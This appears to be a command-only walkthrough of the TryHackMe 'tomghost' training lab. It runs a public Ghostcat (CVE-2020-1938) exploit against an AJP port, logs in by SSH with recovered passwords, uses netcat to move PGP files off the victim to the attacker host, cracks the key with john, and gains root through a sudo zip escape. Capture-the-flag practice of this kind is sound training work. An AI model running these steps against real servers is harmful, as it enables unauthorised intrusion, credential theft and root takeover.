tomghost
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/8080 - HTTP
Kali
gobuster dir -u http://$VICTIM:8080 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Initial Access
Victim
git clone https://github.com/Hancheng-Lei/Hacking-Vulnerability-CVE-2020-1938-Ghostcat.git
cd Hacking-Vulnerability-CVE-2020-1938-Ghostcat/
python2 CVE-2020-1938.py $VICTIM -p 8009 -f WEB-INF/web.xml
TCP/22 - SSH
Kali
ssh skyfuck@$VICTIM
Password: 8730281lkjlkjdqlksalks
Netcat
Kali(receiving)
nc -l -p 1234 > credential.pgp
nc -l -p 1234 > tryhackme.ascVictim(sending)
nc -w 3 $KALI 1234 < credential.pgp
nc -w 3 $KALI 1234 < tryhackme.ascKali
/opt/john/gpg2john tryhackme.asc > pgp.hash
john pgp.hash --wordlist=/usr/share/wordlists/rockyou.txt
Kali
gpg --import tryhackme.asc
Password: alexandru
Kali
gpg --decrypt credential.pgp
Password: alexandru
Privilege Escalation
TCP/22 - SSH
Kali
ssh merlin@$VICTIM
Password: asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123jExploit: https://gtfobins.github.io/gtfobins/zip/
Victim
sudo -l
Victim
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF
Last updated